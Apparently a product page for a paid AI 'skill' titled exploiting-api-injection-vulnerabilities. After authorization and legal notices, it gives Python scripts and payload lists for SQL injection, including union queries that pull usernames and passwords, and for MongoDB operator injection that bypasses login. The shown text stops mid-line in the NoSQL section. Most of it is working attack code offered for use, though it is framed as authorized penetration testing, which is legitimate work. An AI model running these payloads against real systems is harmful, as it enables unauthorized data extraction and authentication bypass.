Claude
Skills
Sign in
Back

exploiting-api-injection-vulnerabilities

Included with Lifetime
$97 forever

Tests APIs for injection vulnerabilities including SQL injection, NoSQL injection, OS command injection, LDAP injection, and Server-Side Request Forgery (SSRF) through API parameters, headers, and request bodies. The tester crafts malicious payloads targeting different backend technologies and injection contexts to extract data, execute commands, or access internal services. Maps to OWASP API8:2023 Security Misconfiguration and API7:2023 SSRF. Activates for requests involving API injection testing, SQLi in APIs, NoSQL injection, SSRF testing, or API input validation assessment.

Backend & APIsapi-securityowaspinjectionsqlinosqlssrfcommand-injectionscripts

What this skill does

# Exploiting API Injection Vulnerabilities

## When to Use

- Testing API endpoints that accept user input for database queries, system commands, or external requests
- Assessing APIs that interact with SQL databases, NoSQL stores (MongoDB, Redis), LDAP directories, or external URLs
- Evaluating input validation and parameterized query usage across all API endpoints
- Testing for SSRF where API parameters accept URLs or hostnames that trigger server-side requests
- Identifying injection points in headers, path parameters, query strings, and JSON/XML request bodies

**Do not use** without written authorization. Injection testing can modify or destroy data and compromise backend systems.

## Prerequisites

- Written authorization specifying target API and backend systems in scope
- Python 3.10+ with `requests` library
- SQLMap for automated SQL injection detection and exploitation
- Burp Suite Professional with Active Scan capabilities
- Knowledge of the backend database technology (MySQL, PostgreSQL, MongoDB, Redis)
- Isolated test environment to avoid production data corruption


> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

## Workflow

### Step 1: Injection Point Identification

```python
import requests
import json
import urllib.parse

BASE_URL = "https://target-api.example.com/api/v1"
headers = {"Authorization": "Bearer <token>", "Content-Type": "application/json"}

# Map all input points across the API
injection_points = [
    # Path parameters
    {"type": "path", "method": "GET", "url": "/users/{input}"},
    {"type": "path", "method": "GET", "url": "/products/{input}"},
    {"type": "path", "method": "GET", "url": "/orders/{input}"},
    # Query parameters
    {"type": "query", "method": "GET", "url": "/users?search={input}"},
    {"type": "query", "method": "GET", "url": "/products?sort={input}&order={input}"},
    {"type": "query", "method": "GET", "url": "/products?category={input}"},
    {"type": "query", "method": "GET", "url": "/search?q={input}"},
    # JSON body parameters
    {"type": "body", "method": "POST", "url": "/auth/login", "fields": ["username", "password"]},
    {"type": "body", "method": "POST", "url": "/users", "fields": ["name", "email"]},
    {"type": "body", "method": "POST", "url": "/search", "fields": ["query", "filters"]},
    {"type": "body", "method": "POST", "url": "/webhook", "fields": ["url", "callback_url"]},
    # Header parameters
    {"type": "header", "method": "GET", "url": "/users/me", "headers": ["X-Forwarded-For", "Referer", "User-Agent"]},
]
```

### Step 2: SQL Injection Testing

```python
# SQL injection payloads for different contexts
SQL_PAYLOADS = {
    "detection": [
        "'",
        "\"",
        "' OR '1'='1",
        "\" OR \"1\"=\"1",
        "1 OR 1=1",
        "' OR 1=1--",
        "' UNION SELECT NULL--",
        "1; WAITFOR DELAY '0:0:5'--",
        "1' AND SLEEP(5)--",
        "1)) OR 1=1--",
    ],
    "union_based": [
        "' UNION SELECT NULL,NULL,NULL--",
        "' UNION SELECT 1,2,3--",
        "' UNION SELECT username,password,NULL FROM users--",
        "-1 UNION SELECT table_name,NULL,NULL FROM information_schema.tables--",
    ],
    "error_based": [
        "' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))--",
        "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
    ],
    "time_based": [
        "' AND SLEEP(5)--",
        "'; WAITFOR DELAY '0:0:5'--",
        "' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
        "1; SELECT pg_sleep(5)--",
    ],
}

import time

def test_sql_injection(endpoint, param_name, param_type="query"):
    """Test a parameter for SQL injection."""
    results = []

    for category, payloads in SQL_PAYLOADS.items():
        for payload in payloads:
            start = time.time()

            if param_type == "query":
                url = f"{BASE_URL}{endpoint}"
                resp = requests.get(url, headers=headers,
                                  params={param_name: payload}, timeout=15)
            elif param_type == "body":
                resp = requests.post(f"{BASE_URL}{endpoint}",
                                   headers=headers,
                                   json={param_name: payload}, timeout=15)
            elif param_type == "path":
                url = f"{BASE_URL}{endpoint.replace('{input}', urllib.parse.quote(payload))}"
                resp = requests.get(url, headers=headers, timeout=15)

            elapsed = time.time() - start

            # Check for SQL injection indicators
            indicators = {
                "error": any(kw in resp.text.lower() for kw in [
                    "sql syntax", "mysql", "postgresql", "sqlite",
                    "oracle", "unterminated", "syntax error",
                    "unexpected end", "quoted string", "invalid input"
                ]),
                "time_based": elapsed > 4.5 and "SLEEP" in payload.upper(),
                "union_data": resp.status_code == 200 and len(resp.text) > 0
                              and "UNION" in payload.upper()
                              and resp.text != requests.get(f"{BASE_URL}{endpoint}",
                                  headers=headers, params={param_name: "test"}).text,
            }

            if any(indicators.values()):
                triggered = [k for k, v in indicators.items() if v]
                results.append({
                    "endpoint": endpoint,
                    "param": param_name,
                    "category": category,
                    "payload": payload,
                    "indicators": triggered,
                    "status": resp.status_code,
                    "time": f"{elapsed:.1f}s"
                })
                print(f"[SQLi] {endpoint} ({param_name}): {category} - {triggered}")

    return results

# Test search parameter
test_sql_injection("/search", "q", "query")
test_sql_injection("/products", "category", "query")
test_sql_injection("/auth/login", "username", "body")
```

### Step 3: NoSQL Injection Testing

```python
# NoSQL injection payloads (MongoDB-focused)
NOSQL_PAYLOADS = {
    "auth_bypass": [
        # MongoDB operator injection in JSON body
        {"username": {"$ne": ""}, "password": {"$ne": ""}},
        {"username": {"$gt": ""}, "password": {"$gt": ""}},
        {"username": {"$regex": ".*"}, "password": {"$regex": ".*"}},
        {"username": "admin", "password": {"$ne": "wrongpassword"}},
        {"username": {"$in": ["admin", "root", "administrator"]}, "password": {"$ne": ""}},
    ],
    "data_extraction": [
        {"username": {"$regex": "^a"}, "password": {"$ne": ""}},  # Enumerate first char
        {"username": {"$where": "this.username.length > 0"}, "password": {"$ne": ""}},
    ],
    "operator_injection_string": [
        # When input is a string field
        '{"$gt": ""}',
        '{"$ne": null}',
        '{"$regex": ".*"}',
        '{"$where": "1==1"}',
    ],
}

def test_nosql_injection(endpoint, method="POST"):
    """Test for MongoDB NoSQL injection."""
    results = []

    # Test JSON body operator injection
    for category, payloads in NOSQL_PAYLOADS.items():
        for payload in payloads:
            if isinstance(payload, dict):
                resp = requests.post(f"{BASE_URL}{endpoint}",
                                   headers=headers, json=payload, timeout=10)
            else:
                # Test as string parameter
                resp = requests.post(f"{BASE_URL}{endpoint}",
                                   headers=headers,
                                   json={"username": json.loads(payload), "password": "test"},
                                   timeout=10)

            if resp.status_code == 200:
                resp_data = resp.json() if r

Related in Backend & APIs